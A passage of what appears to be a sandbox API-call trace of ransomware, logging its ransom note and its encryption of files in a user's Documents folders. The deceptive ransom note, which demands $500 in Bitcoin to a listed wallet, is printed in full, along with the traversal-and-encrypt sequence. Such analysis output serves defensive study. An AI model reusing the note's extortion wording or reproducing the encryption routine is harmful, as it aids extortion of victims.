HALPmcxz\\Documents\\Mxlov\\RESTORE_FILES.txt") returned 67 [0091.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.424] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.424] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, 
lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.425] lstrlenA (lpString="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") returned 684 [0091.425] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.425] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.425] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.425] CloseHandle (hObject=0xb4) returned 1 [0091.426] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.426] lstrcmpiW (lpString1="My Music", lpString2="Windows") returned -1 [0091.426] lstrcmpiW (lpString1="My Music", lpString2="Program Files") returned -1 [0091.426] lstrcmpiW (lpString1="My Music", lpString2="Program Files (x86)") returned -1 [0091.426] lstrcmpiW (lpString1="My Music", lpString2="$Recycle.bin") returned 1 [0091.426] lstrcmpiW (lpString1="My Music", lpString2="System Volume Information") returned -1 [0091.426] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned 52 [0091.426] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0091.426] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0091.427] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*") returned 54 [0091.427] 
FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0091.427] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.427] lstrcmpiW (lpString1="My Pictures", lpString2="Windows") returned -1 [0091.427] lstrcmpiW (lpString1="My Pictures", lpString2="Program Files") returned -1 [0091.427] lstrcmpiW (lpString1="My Pictures", lpString2="Program Files (x86)") returned -1 [0091.427] lstrcmpiW (lpString1="My Pictures", lpString2="$Recycle.bin") returned 1 [0091.427] lstrcmpiW (lpString1="My Pictures", lpString2="System Volume Information") returned -1 [0091.427] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned 55 [0091.427] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0091.427] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0091.427] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*") returned 57 [0091.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0091.427] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.427] lstrcmpiW (lpString1="My Shapes", lpString2="Windows") returned -1 [0091.427] lstrcmpiW (lpString1="My Shapes", lpString2="Program Files") returned -1 [0091.427] lstrcmpiW (lpString1="My Shapes", lpString2="Program Files (x86)") returned -1 [0091.427] lstrcmpiW (lpString1="My Shapes", lpString2="$Recycle.bin") returned 1 [0091.427] lstrcmpiW (lpString1="My Shapes", lpString2="System Volume Information") returned -1 [0091.427] wnsprintfW (in: 
pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned 53 [0091.427] lstrcmpW (lpString1="My Shapes", lpString2=".") returned 1 [0091.427] lstrcmpW (lpString1="My Shapes", lpString2="..") returned 1 [0091.427] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*") returned 55 [0091.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.428] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.428] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.428] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.428] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.428] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.428] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\.") returned 55 [0091.428] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.428] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.428] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.428] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.428] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.428] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.428] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.428] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.428] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.428] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.428] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.428] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\..") returned 56 [0091.428] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.429] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.429] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.429] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.429] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.429] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.429] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.429] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.429] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.429] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.429] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.429] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.429] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 65 [0091.429] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.429] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.429] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.429] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 65 [0091.430] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 
[0091.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 65 [0091.430] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 65 [0091.430] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.431] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0xd8, lpOverlapped=0x0) returned 1 [0091.432] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.432] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0xd8, lpOverlapped=0x0) returned 1 [0091.432] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.432] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.432] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.432] CloseHandle (hObject=0xd4) returned 1 [0091.433] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.protected") returned 75 [0091.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini.protected")) returned 1 [0091.435] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.435] lstrcmpiW (lpString1="Favorites.vss", lpString2="Windows") returned -1 [0091.435] lstrcmpiW (lpString1="Favorites.vss", lpString2="Program Files") returned -1 [0091.435] lstrcmpiW (lpString1="Favorites.vss", lpString2="Program Files (x86)") returned -1 [0091.435] lstrcmpiW (lpString1="Favorites.vss", lpString2="$Recycle.bin") returned 1 [0091.435] lstrcmpiW (lpString1="Favorites.vss", lpString2="System Volume Information") returned -1 [0091.435] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 [0091.435] StrStrIW (lpFirst="Favorites.vss", lpSrch=".protected") returned 0x0 [0091.435] lstrcmpW (lpString1="Favorites.vss", lpString2="RESTORE_FILES.txt") returned -1 [0091.435] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.435] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.435] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 
[0091.436] StrStrW (lpFirst="Favorites.vss", lpSrch=".txt") returned 0x0 [0091.436] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 [0091.436] StrStrW (lpFirst="Favorites.vss", lpSrch=".rar") returned 0x0 [0091.436] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 [0091.436] StrStrW (lpFirst="Favorites.vss", lpSrch=".zip") returned 0x0 [0091.436] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x0, lpOverlapped=0x0) returned 1 [0091.436] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.436] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x0, lpOverlapped=0x0) returned 1 [0091.436] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.436] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.437] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.437] CloseHandle (hObject=0xd4) returned 1 [0091.438] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.protected") returned 77 [0091.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.protected")) returned 1 [0091.438] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.439] lstrcmpiW (lpString1="_private", lpString2="Windows") returned -1 [0091.439] lstrcmpiW (lpString1="_private", lpString2="Program Files") returned -1 [0091.439] lstrcmpiW (lpString1="_private", lpString2="Program Files (x86)") returned -1 [0091.439] lstrcmpiW (lpString1="_private", lpString2="$Recycle.bin") returned 1 [0091.439] lstrcmpiW (lpString1="_private", lpString2="System Volume Information") returned -1 [0091.439] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned 62 [0091.439] lstrcmpW (lpString1="_private", lpString2=".") returned 1 [0091.439] lstrcmpW (lpString1="_private", lpString2="..") returned 1 [0091.439] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*") returned 64 [0091.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0091.465] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.466] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.466] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.466] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.466] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.466] wnsprintfW (in: 
pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\.") returned 64 [0091.466] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.466] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.466] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.466] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0091.466] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0091.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.466] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0091.466] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.466] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.466] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.466] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.466] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.466] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\..") returned 65 [0091.466] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.466] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.466] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.466] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") 
returned -1 [0091.466] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0091.466] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0091.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.467] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0091.467] lstrcmpiW (lpString1="folder.ico", lpString2="Windows") returned -1 [0091.467] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files") returned -1 [0091.467] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files (x86)") returned -1 [0091.467] lstrcmpiW (lpString1="folder.ico", lpString2="$Recycle.bin") returned 1 [0091.467] lstrcmpiW (lpString1="folder.ico", lpString2="System Volume Information") returned -1 [0091.467] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0091.467] StrStrIW (lpFirst="folder.ico", lpSrch=".protected") returned 0x0 [0091.467] lstrcmpW (lpString1="folder.ico", lpString2="RESTORE_FILES.txt") returned -1 [0091.467] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0091.467] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0091.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My 
Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0091.468] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0091.468] StrStrW (lpFirst="folder.ico", lpSrch=".txt") returned 0x0 [0091.468] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0091.468] StrStrW (lpFirst="folder.ico", lpSrch=".rar") returned 0x0 [0091.468] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0091.468] StrStrW (lpFirst="folder.ico", lpSrch=".zip") returned 0x0 [0091.468] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.482] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.482] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.483] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.483] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0091.483] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
